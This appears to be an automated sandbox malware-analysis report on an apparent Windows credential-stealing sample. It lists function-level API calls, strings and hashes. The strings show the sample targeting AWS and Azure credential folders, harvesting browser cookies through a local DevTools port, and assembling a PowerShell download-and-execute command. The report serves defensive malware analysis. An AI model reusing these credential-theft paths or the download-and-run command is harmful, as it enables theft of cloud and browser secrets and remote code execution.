                              • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 007CE82D
                              • lstrcpy.KERNEL32(00000000,?), ref: 007CE85F
                              • lstrcat.KERNEL32(?,00000000), ref: 007CE86D
                              • lstrcat.KERNEL32(?,\.aws\), ref: 007CE886
                              • memset.MSVCRT ref: 007CE8C5
                              • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 007CE8F1
                              • lstrcpy.KERNEL32(00000000,?), ref: 007CE920
                              • lstrcat.KERNEL32(?,00000000), ref: 007CE92E
                              • lstrcat.KERNEL32(?,\.IdentityService\), ref: 007CE947
                              • memset.MSVCRT ref: 007CE986
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$memset$FolderPathlstrcpy
                              • String ID: *.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                              • API String ID: 4067350539-3645552435
                              • Opcode ID: 7bd14281b7e0c9aa3beb65589a1a79fc822bfee413e1fd02f9c5c1f58b77b71c
                              • Instruction ID: dd0729d435db497bc7d1fed987594cf511a48cc33565dde99e0cb0af35e2d5d4
                              • Opcode Fuzzy Hash: 7bd14281b7e0c9aa3beb65589a1a79fc822bfee413e1fd02f9c5c1f58b77b71c
                              • Instruction Fuzzy Hash: 61713A71E51258ABDB21EB64DC8AFED7374AF48700F4044A8B719BB1C1DA78AE448B54
                              Function 007CABB2 Relevance: 39.3, APIs: 25, Strings: 1, Instructions: 297stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcpy.KERNEL32 ref: 007CABCF
                              • lstrlen.KERNEL32(0145DA98), ref: 007CABE5
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007CAC0D
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007CAC18
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007CAC41
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007CAC84
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007CAC8E
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007CACB7
                              • lstrlen.KERNEL32(007E4AD4), ref: 007CACD1
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007CACF3
                              • lstrcat.KERNEL32(00000000,007E4AD4), ref: 007CACFF
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007CAD28
                              • lstrlen.KERNEL32(007E4AD4), ref: 007CAD3A
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007CAD5C
                              • lstrcat.KERNEL32(00000000,007E4AD4), ref: 007CAD68
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007CAD91
                              • lstrlen.KERNEL32(0145D930), ref: 007CADA7
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007CADCF
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007CADDA
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007CAE03
                              • lstrcpy.KERNEL32(00000000,?), ref: 007CAE3F
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007CAE49
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007CAE6F
                              • lstrlen.KERNEL32(00000000), ref: 007CAE85
                              • lstrcpy.KERNEL32(00000000,0145DB28), ref: 007CAEB8
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$lstrlen
                              • String ID: f
                              • API String ID: 2762123234-1993550816
                              • Opcode ID: 8b2c40d312a882556cce29caac45103f61be4c41c2d4e0375e02e63933387562
                              • Instruction ID: 5dc559a32ce973b3925c432e3b7f08e9beb2f8d139213df1b2e6e1db52010c95
                              • Opcode Fuzzy Hash: 8b2c40d312a882556cce29caac45103f61be4c41c2d4e0375e02e63933387562
                              • Instruction Fuzzy Hash: C8B1403092651AEBDB21EF64DC8DBAF77B5AF40306F04452CB815A7256DB38DD02CB91
                              Function 007D47E0 Relevance: 38.5, APIs: 11, Strings: 11, Instructions: 48libraryloaderCOMMON
                              Download Yara Rule
                              APIs
                              • LoadLibraryA.KERNEL32(ws2_32.dll,?,007C72A4), ref: 007D47E6
                              • GetProcAddress.KERNEL32(00000000,connect), ref: 007D47FC
                              • GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 007D480D
                              • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 007D481E
                              • GetProcAddress.KERNEL32(00000000,htons), ref: 007D482F
                              • GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 007D4840
                              • GetProcAddress.KERNEL32(00000000,recv), ref: 007D4851
                              • GetProcAddress.KERNEL32(00000000,socket), ref: 007D4862
                              • GetProcAddress.KERNEL32(00000000,freeaddrinfo), ref: 007D4873
                              • GetProcAddress.KERNEL32(00000000,closesocket), ref: 007D4884
                              • GetProcAddress.KERNEL32(00000000,send), ref: 007D4895
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: WSACleanup$WSAStartup$closesocket$connect$freeaddrinfo$getaddrinfo$htons$recv$send$socket$ws2_32.dll
                              • API String ID: 2238633743-3087812094
                              • Opcode ID: 493539b01db616e5957a876e3f01b9cd35b9257a47ff94f4548834811bc29e27
                              • Instruction ID: 4f40a9a964903d77e72aa80d0e3bc27140f7ce890c1b108eae18f2dc46e8642f
                              • Opcode Fuzzy Hash: 493539b01db616e5957a876e3f01b9cd35b9257a47ff94f4548834811bc29e27
                              • Instruction Fuzzy Hash: FC1176F197A7D8ABC710AFF6AC8DA563A74BB0E70E344081EF555DA150DAF84900FB50
                              Function 007CBE20 Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 203stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007CBE53
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007CBE86
                              • lstrlen.KERNEL32(-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 007CBE91
                              • lstrcpy.KERNEL32(00000000,?), ref: 007CBEB1
                              • lstrcat.KERNEL32(00000000,-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 007CBEBD
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007CBEE0
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007CBEEB
                              • lstrlen.KERNEL32(')"), ref: 007CBEF6
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007CBF13
                              • lstrcat.KERNEL32(00000000,')"), ref: 007CBF1F
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007CBF46
                              • lstrlen.KERNEL32(C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 007CBF66
                              • lstrcpy.KERNEL32(00000000,?), ref: 007CBF88
                              • lstrcat.KERNEL32(00000000,C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 007CBF94
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007CBFBA
                              • ShellExecuteEx.SHELL32(?), ref: 007CC00C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$lstrlen$ExecuteShell
                              • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              • API String ID: 4016326548-898575020
                              • Opcode ID: 7f3075da9fb2888746449e4a0cfa98e4956060edb17e9ca7fa0362c66f6067a0
                              • Instruction ID: 720f34e931714687d6e3c80093b9519e908914279b05142204900c0cfa4b0ae9
                              • Opcode Fuzzy Hash: 7f3075da9fb2888746449e4a0cfa98e4956060edb17e9ca7fa0362c66f6067a0
                              • Instruction Fuzzy Hash: 61617471A152569BCB21AFB59C8ABAF7BB9AF04700F04442DF905E7252DB3CDD028B91
                              Function 007D1820 Relevance: 31.5, APIs: 25, Instructions: 269stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007D184F
                              • lstrlen.KERNEL32(01445B90), ref: 007D1860
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007D1887
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007D1892
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007D18C1
                              • lstrlen.KERNEL32(007E4FA0), ref: 007D18D3
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007D18F4
                              • lstrcat.KERNEL32(00000000,007E4FA0), ref: 007D1900
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007D192F
                              • lstrlen.KERNEL32(01445BA0), ref: 007D1945
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007D196C
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007D1977
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007D19A6
                              • lstrlen.KERNEL32(007E4FA0), ref: 007D19B8
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007D19D9
                              • lstrcat.KERNEL32(00000000,007E4FA0), ref: 007D19E5
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007D1A14
                              • lstrlen.KERNEL32(01445BB0), ref: 007D1A2A
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007D1A51
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007D1A5C
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007D1A8B
                              • lstrlen.KERNEL32(01445BE0), ref: 007D1AA1
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007D1AC8
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007D1AD3
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007D1B02
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcatlstrlen
                              • String ID:
                              • API String ID: 1049500425-0
                              • Opcode ID: 1c0f7bd534c450d961ae88534b7d7bb620695d4cc603eca68ec7832fa48fbf0a
                              • Instruction ID: f7ab624bd50bd37133ec75dce79df8fc03ab5b872e49f1b773df1b1846ebb836
                              • Opcode Fuzzy Hash: 1c0f7bd534c450d961ae88534b7d7bb620695d4cc603eca68ec7832fa48fbf0a
                              • Instruction Fuzzy Hash: 70912DB1615743EBDB20DFB5DC98A57B7F8AF14300B54882AA886D7352DB38EC41DB60
                              Function 007C4760 Relevance: 30.3, APIs: 18, Strings: 2, Instructions: 309stringmemoryCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcpy.KERNEL32(00000000,?), ref: 007C4793
                              • LocalAlloc.KERNEL32(00000040,?), ref: 007C47C5
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007C4812
                              • lstrlen.KERNEL32(007E4B60), ref: 007C481D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C483A
                              • lstrcat.KERNEL32(00000000,007E4B60), ref: 007C4846
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C486B
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C4898
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007C48A3
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C48CA
                              • StrStrA.SHLWAPI(?,00000000), ref: 007C48DC
                              • lstrlen.KERNEL32(?), ref: 007C48F0
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007C4931
                              • lstrcpy.KERNEL32(00000000,?), ref: 007C49B8
                              • lstrcpy.KERNEL32(00000000,?), ref: 007C49E1
                              • lstrcpy.KERNEL32(00000000,?), ref: 007C4A0A
                              • lstrcpy.KERNEL32(00000000,?), ref: 007C4A30
                              • lstrcpy.KERNEL32(00000000,?), ref: 007C4A5D
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcatlstrlen$AllocLocal
                              • String ID: ^userContextId=4294967295$moz-extension+++
                              • API String ID: 4107348322-3310892237
                              • Opcode ID: d2f4820f11bdf3497caad64b779557fa27efde81b7731e969436293f77ba34c2
                              • Instruction ID: 0961dcd1c6e3aef39047a6b868a7c75d0ef5229bd739338be801c249e469f977
                              • Opcode Fuzzy Hash: d2f4820f11bdf3497caad64b779557fa27efde81b7731e969436293f77ba34c2
                              • Instruction Fuzzy Hash: FCB16171A162569BDB21EF74D899B9E77B5AF44300F05852CFC45BB312DB38EC068B90
                              Function 007B92B0 Relevance: 27.4, APIs: 13, Strings: 5, Instructions: 369stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 007B90C0: InternetOpenA.WININET(007DCFEC,00000001,00000000,00000000,00000000), ref: 007B90DF
                                • Part of subcall function 007B90C0: InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 007B90FC
                                • Part of subcall function 007B90C0: InternetCloseHandle.WININET(00000000), ref: 007B9109
                              • strlen.MSVCRT ref: 007B92E1
                              • strlen.MSVCRT ref: 007B92FA
                                • Part of subcall function 007B8980: std::_Xinvalid_argument.LIBCPMT ref: 007B8996
                              • strlen.MSVCRT ref: 007B9399
                              • strlen.MSVCRT ref: 007B93E6
                              • lstrcat.KERNEL32(?,cookies), ref: 007B9547
                              • lstrcat.KERNEL32(?,007E1794), ref: 007B9559
                              • lstrcat.KERNEL32(?,?), ref: 007B956A
                              • lstrcat.KERNEL32(?,007E4B98), ref: 007B957C
                              • lstrcat.KERNEL32(?,?), ref: 007B958D
                              • lstrcat.KERNEL32(?,.txt), ref: 007B959F
                              • lstrlen.KERNEL32(?), ref: 007B95B6
                              • lstrlen.KERNEL32(?), ref: 007B95DB
                              • lstrcpy.KERNEL32(00000000,?), ref: 007B9614
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$strlen$Internet$Openlstrlen$CloseHandleXinvalid_argumentlstrcpystd::_
                              • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                              • API String ID: 1201316467-3542011879
                              • Opcode ID: 2ef971139e428da76a262e471daa24693dcd1d489f9c870a2616432ce11ca470
                              • Instruction ID: 5ebae87fc8b6dcd6613654c5f3df819df115a9f2f8909d76779f2bc3172ac06e
                              • Opcode Fuzzy Hash: 2ef971139e428da76a262e471daa24693dcd1d489f9c870a2616432ce11ca470
                              • Instruction Fuzzy Hash: C1E11871E11258DBDF10DFA8D885BDEBBB5BF48300F1084A9E619B7241EB389E45CB51
                              Function 007CD980 Relevance: 27.3, APIs: 18, Instructions: 292stringCOMMON
                              Download Yara Rule
                              APIs
                              • memset.MSVCRT ref: 007CD9A1
                              • memset.MSVCRT ref: 007CD9B3
                              • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 007CD9DB
                              • lstrcpy.KERNEL32(00000000,?), ref: 007CDA0E
                              • lstrcat.KERNEL32(?,00000000), ref: 007CDA1C
                              • lstrcat.KERNEL32(?,0145DEB8), ref: 007CDA36
                              • lstrcat.KERNEL32(?,?), ref: 007CDA4A
                              • lstrcat.KERNEL32(?,0145CED8), ref: 007CDA5E
                              • lstrcpy.KERNEL32(00000000,?), ref: 007CDA8E
                              • GetFileAttributesA.KERNEL32(00000000), ref: 007CDA95
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007CDAFE
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
